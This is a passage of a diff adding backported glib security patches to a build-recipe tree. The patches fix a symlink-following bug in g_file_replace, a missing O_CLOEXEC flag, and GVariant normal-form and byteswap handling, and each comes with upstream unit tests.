+ fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
+@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
++ if (replace_destination_set)
+ {
+ g_close (fd, NULL);
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
+Backport of:
+
+From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:36:07 +0000
+Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
+ with symlinks
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
+the destination file and re-creating it from scratch. That did
+previously work, but in the process the code would call `open(O_CREAT)`
+on the file. If the file was a dangling symlink, this would create the
+destination file (empty). That’s not an intended side-effect, and has
+security implications if the symlink is controlled by a lower-privileged
+process.
+
+Fix that by not opening the destination file if it’s a symlink, and
+adjusting the rest of the code to cope with
+ - the fact that `fd == -1` is not an error iff `is_symlink` is true,
+ - and that `original_stat` will contain the `lstat()` results for the
+ symlink now, rather than the `stat()` results for its target (again,
+ iff `is_symlink` is true).
+
+This means that the target of the dangling symlink is no longer created,
+which was the bug. The symlink itself continues to be replaced (as
+before) with the new file — this is the intended behaviour of
+`g_file_replace()`.
+
+The behaviour for non-symlink cases, or cases where the symlink was not
+dangling, should be unchanged.
+
+Includes a unit test.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2325
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 77 ++++++++++++++++++-------
+ gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++
+ 2 files changed, 163 insertions(+), 22 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi
+ /* Could be a symlink, or it could be a regular ELOOP error,
+ * but then the next open will fail too. */
+ is_symlink = TRUE;
+- fd = g_open (filename, open_flags, mode);
++ if (!replace_destination_set)
++ fd = g_open (filename, open_flags, mode);
+ }
+-#else
+- fd = g_open (filename, open_flags, mode);
+- errsv = errno;
++#else /* if !O_NOFOLLOW */
+ /* This is racy, but we do it as soon as possible to minimize the race */
+ is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
++
++ if (!is_symlink || !replace_destination_set)
++ {
++ fd = g_open (filename, open_flags, mode);
++ errsv = errno;
++ }
+ #endif
+
+- if (fd == -1)
++ if (fd == -1 &&
++ (!is_symlink || !replace_destination_set))
+ {
+ char *display_name = g_filename_display_name (filename);
+ g_set_error (error, G_IO_ERROR,
+@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi
+ #ifdef G_OS_WIN32
+ res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
+ #else
+- res = fstat (fd, &original_stat);
++ if (!is_symlink)
++ {
++ res = fstat (fd, &original_stat);
++ }
++ else
++ {
++ res = lstat (filename, &original_stat);
++ }
+ #endif
+ errsv = errno;
+
+@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi
+ if (!S_ISREG (original_stat.st_mode))
+ {
+ if (S_ISDIR (original_stat.st_mode))
+- g_set_error_literal (error,
+- G_IO_ERROR,
+- G_IO_ERROR_IS_DIRECTORY,
+- _("Target file is a directory"));
+- else
+- g_set_error_literal (error,
++ {
++ g_set_error_literal (error,
++ G_IO_ERROR,
++ G_IO_ERROR_IS_DIRECTORY,
++ _("Target file is a directory"));
++ goto err_out;
++ }
++ else if (!is_symlink ||
++#ifdef S_ISLNK
++ !S_ISLNK (original_stat.st_mode)
++#else
++ FALSE
++#endif
++ )
++ {
++ g_set_error_literal (error,
+ G_IO_ERROR,
+ G_IO_ERROR_NOT_REGULAR_FILE,
+ _("Target file is not a regular file"));
+- goto err_out;
++ goto err_out;
++ }
+ }
+
+ if (etag != NULL)
+@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- g_close (fd, NULL);
++ if (fd >= 0)
++ g_close (fd, NULL);
+ *temp_filename = tmp_filename;
+ return tmpfd;
+ }
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -804,6 +804,113 @@ test_replace_cancel (void)
+ g_object_unref (tmpdir);
+ }
+
++static void
++test_replace_symlink (void)
++{
++#ifdef G_OS_UNIX
++ gchar *tmpdir_path = NULL;
++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
++ GFileOutputStream *stream = NULL;
++ const gchar *new_contents = "this is a test message which should be written to source and not target";
++ gsize n_written;
++ GFileEnumerator *enumerator = NULL;
++ GFileInfo *info = NULL;
++ gchar *contents = NULL;
++ gsize length = 0;
++ GError *local_error = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
++
++ /* Create a fresh, empty working directory. */
++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
++ g_assert_no_error (local_error);
++ tmpdir = g_file_new_for_path (tmpdir_path);
++
++ g_test_message ("Using temporary directory %s", tmpdir_path);
++ g_free (tmpdir_path);
++
++ /* Create symlink `source` which points to `target`. */
++ source_file = g_file_get_child (tmpdir, "source");
++ target_file = g_file_get_child (tmpdir, "target");
++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ /* Ensure that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Replace the `source` symlink with a regular file using
++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
++ * following the symlink */
++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */,
++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
++ &n_written, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpint (n_written, ==, strlen (new_contents));
++
++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&stream);
++
++ /* At this point, there should still only be one file: `source`. It should
++ * now be a regular file. `target` should not exist. */
++ enumerator = g_file_enumerate_children (tmpdir,
++ G_FILE_ATTRIBUTE_STANDARD_NAME ","
++ G_FILE_ATTRIBUTE_STANDARD_TYPE,
++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_nonnull (info);
++
++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
++
++ g_clear_object (&info);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_null (info);
++
++ g_file_enumerator_close (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_clear_object (&enumerator);
++
++ /* Double-check that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Check the content of `source`. */
++ g_file_load_contents (source_file,
++ NULL,
++ &contents,
++ &length,
++ NULL,
++ &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpstr (contents, ==, new_contents);
++ g_assert_cmpuint (length, ==, strlen (new_contents));
++ g_free (contents);
++
++ /* Tidy up. */
++ g_file_delete (source_file, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_file_delete (tmpdir, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&target_file);
++ g_clear_object (&source_file);
++ g_clear_object (&tmpdir);
++#else /* if !G_OS_UNIX */
++ g_test_skip ("Symlink replacement tests can only be run on Unix")
++#endif
++}
++
+ static void
+ on_file_deleted (GObject *object,
+ GAsyncResult *result,
+@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
+ g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
+ g_test_add_func ("/file/replace-load", test_replace_load);
+ g_test_add_func ("/file/replace-cancel", test_replace_cancel);
++ g_test_add_func ("/file/replace-symlink", test_replace_symlink);
+ g_test_add_func ("/file/async-delete", test_async_delete);
+ #ifdef G_OS_UNIX
+ g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+ char *tmp_filename;
+ char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+ sync_on_close = FALSE;
+
+ /* If the file doesn't exist, create it */
+- open_flags = O_CREAT | O_EXCL | O_BINARY;
++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+ if (readable)
+ open_flags |= O_RDWR;
+ else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+ set_error_from_open_errno (filename, error);
+ return NULL;
+ }
+-
+-
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++ else
++ fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+ stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+ stream->priv->fd = fd;
+ stream->priv->sync_on_close = sync_on_close;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
+From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 04:19:44 +0000
+Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
+
+The entries in an offset table (which is used for variable sized arrays
+and tuples containing variable sized members) are sized so that they can
+address every byte in the overall variant.
+
+The specification requires that for a variant to be in normal form, its
+offset table entries must be the minimum width such that they can
+address every byte in the variant.
+
+That minimality requirement was not checked in
+`g_variant_is_normal_form()`, leading to two different byte arrays being
+interpreted as the normal form of a given variant tree. That kind of
+confusion could potentially be exploited, and is certainly a bug.
+
+Fix it by adding the necessary checks on offset table entry width, and
+unit tests.
+
+Spotted by William Manley.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2794
+
+CVE: CVE-2023-29499
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 19 +++-
+ glib/tests/gvariant.c | 176 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 194 insertions(+), 1 deletion(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 0bf7243..5aa2cbc 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ out.data_size = last_end;
+ out.array = value.data + last_end;
+ out.length = offsets_array_size / out.offset_size;
++
++ if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
++ return out; /* offset size not minimal */
++
+ out.is_normal = TRUE;
+
+ return out;
+@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ gsize length;
+ gsize offset;
+ gsize i;
++ gsize offset_table_size;
+
+ /* as per the comment in gvs_tuple_get_child() */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ }
+ }
+
+- return offset_ptr == offset;
++ /* @offset_ptr has been counting backwards from the end of the variant, to
++ * find the beginning of the offset table. @offset has been counting forwards
++ * from the beginning of the variant to find the end of the data. They should
++ * have met in the middle. */
++ if (offset_ptr != offset)
++ return FALSE;
++
++ offset_table_size = value.size - offset_ptr;
++ if (value.size > 0 &&
++ gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
++ return FALSE; /* offset size not minimal */
++
++ return TRUE;
+ }
+
+ /* Variants {{{2
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index d640c81..4ce0e4f 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_array_offsets_minimal_sized (void)
++{
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *aay_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *aay_deserialised = NULL;
++ GVariant *aay_normalised = NULL;
++
++ /* Construct an array of type aay, consisting of 128 elements which are each
++ * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
++ * elements are variable sized (making the outer array variable sized, so it
++ * must have an offset table), but they are also zero-sized when serialised.
++ * So the serialised representation of @aay_constructed consists entirely of
++ * its offset table, which is entirely zeroes.
++ *
++ * The array is chosen to be 128 elements long because that means offset
++ * table entries which are 1 byte long. If the elements in the array were
++ * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
++ * the offset table entries would end up being 2 bytes long. */
++ g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
++
++ for (i = 0; i < 128; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ aay_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed array is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (aay_constructed));
++ g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
++
++ data = g_variant_get_data (aay_constructed);
++ for (i = 0; i < g_variant_get_size (aay_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
++ * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the elements of the array are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (aay_deserialised));
++ g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
++
++ data = g_variant_get_data (aay_deserialised);
++ for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ aay_normalised = g_variant_get_normal_form (aay_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (aay_normalised));
++ g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
++
++ data = g_variant_get_data (aay_normalised);
++ for (i = 0; i < g_variant_get_size (aay_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (aay_normalised);
++ g_variant_unref (aay_deserialised);
++ g_variant_unref (aay_constructed);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_tuple_offsets_minimal_sized (void)
++{
++ GString *type_string = NULL;
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *ray_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *ray_deserialised = NULL;
++ GVariant *ray_normalised = NULL;
++
++ /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
++ * an empty array, i.e. `([] * 129)`. This is chosen because the inner
++ * members are variable sized, so the outer tuple must have an offset table,
++ * but they are also zero-sized when serialised. So the serialised
++ * representation of @ray_constructed consists entirely of its offset table,
++ * which is entirely zeroes.
++ *
++ * The tuple is chosen to be 129 members long because that means it has 128
++ * offset table entries which are 1 byte long each. If the members in the
++ * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
++ * bytes long), the offset table entries would end up being 2 bytes long.
++ *
++ * 129 members are used unlike 128 array elements in
++ * test_normal_checking_array_offsets_minimal_sized(), because the last member
++ * in a tuple never needs an offset table entry. */
++ type_string = g_string_new ("");
++ g_string_append_c (type_string, '(');
++ for (i = 0; i < 129; i++)
++ g_string_append (type_string, "ay");
++ g_string_append_c (type_string, ')');
++
++ g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
++
++ for (i = 0; i < 129; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ ray_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed tuple is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (ray_constructed));
++ g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
++
++ data = g_variant_get_data (ray_constructed);
++ for (i = 0; i < g_variant_get_size (ray_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
++ * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the members of the tuple are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (ray_deserialised));
++ g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
++
++ data = g_variant_get_data (ray_deserialised);
++ for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ ray_normalised = g_variant_get_normal_form (ray_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (ray_normalised));
++ g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
++
++ data = g_variant_get_data (ray_normalised);
++ for (i = 0; i < g_variant_get_size (ray_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (ray_normalised);
++ g_variant_unref (ray_deserialised);
++ g_variant_unref (ray_constructed);
++ g_string_free (type_string, TRUE);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
+ test_normal_checking_array_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
++ test_normal_checking_array_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
+@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
++ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 8 +++++---
+ glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
+ 2 files changed, 29 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 8ba701e..4dbd9e8 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
+ g_variant_serialised_byteswap (serialised);
+
+ bytes = g_bytes_new_take (serialised.data, serialised.size);
+- new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
++ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
+ else
+ /* contains no multi-byte data */
+- new = value;
++ new = g_variant_get_normal_form (value);
+
+- return g_variant_ref_sink (new);
++ g_assert (g_variant_is_trusted (new));
++
++ return g_steal_pointer (&new);
+ }
+
+ /**
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 4ce0e4f..3dda08e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
+ g_free (string);
+ }
+
++static void
++test_gv_byteswap_non_normal_non_aligned (void)
++{
++ const guint8 data[] = { 0x02 };
++ GVariant *v = NULL;
++ GVariant *v_byteswapped = NULL;
++
++ g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
++ "is in non-normal form and doesn’t need byteswapping returns "
++ "the same variant in normal form.");
++
++ v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
++ g_assert_false (g_variant_is_normal_form (v));
++
++ v_byteswapped = g_variant_byteswap (v);
++ g_assert_true (g_variant_is_normal_form (v_byteswapped));
++
++ g_assert_cmpvariant (v, v_byteswapped);
++
++ g_variant_unref (v);
++ g_variant_unref (v_byteswapped);
++}
++
+ static void
+ test_parser (void)
+ {
+@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
+ g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
+ g_test_add_func ("/gvariant/hashing", test_hashing);
+ g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
++ g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
+ g_test_add_func ("/gvariant/parser", test_parses);
+ g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
+ g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
new file mode 100644
index 0000000000..9167ea624f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 81 +++++++++++++++++++++++++++++++++----------
+ glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
+ 2 files changed, 112 insertions(+), 26 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 4dbd9e8..a80c2c9 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
+
+ /* Serialised data {{{1 */
+ static GVariant *
+-g_variant_deep_copy (GVariant *value)
++g_variant_deep_copy (GVariant *value,
++ gboolean byteswap)
+ {
+ switch (g_variant_classify (value))
+ {
+@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
+ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
+ GVariant *child = g_variant_get_child_value (value, i);
+- g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
++ g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
+ g_variant_unref (child);
+ }
+
+@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
+ return g_variant_new_byte (g_variant_get_byte (value));
+
+ case G_VARIANT_CLASS_INT16:
+- return g_variant_new_int16 (g_variant_get_int16 (value));
++ if (byteswap)
++ return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
++ else
++ return g_variant_new_int16 (g_variant_get_int16 (value));
+
+ case G_VARIANT_CLASS_UINT16:
+- return g_variant_new_uint16 (g_variant_get_uint16 (value));
++ if (byteswap)
++ return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
++ else
++ return g_variant_new_uint16 (g_variant_get_uint16 (value));
+
+ case G_VARIANT_CLASS_INT32:
+- return g_variant_new_int32 (g_variant_get_int32 (value));
++ if (byteswap)
++ return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
++ else
++ return g_variant_new_int32 (g_variant_get_int32 (value));
+
+ case G_VARIANT_CLASS_UINT32:
+- return g_variant_new_uint32 (g_variant_get_uint32 (value));
++ if (byteswap)
++ return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
++ else
++ return g_variant_new_uint32 (g_variant_get_uint32 (value));
+
+ case G_VARIANT_CLASS_INT64:
+- return g_variant_new_int64 (g_variant_get_int64 (value));
++ if (byteswap)
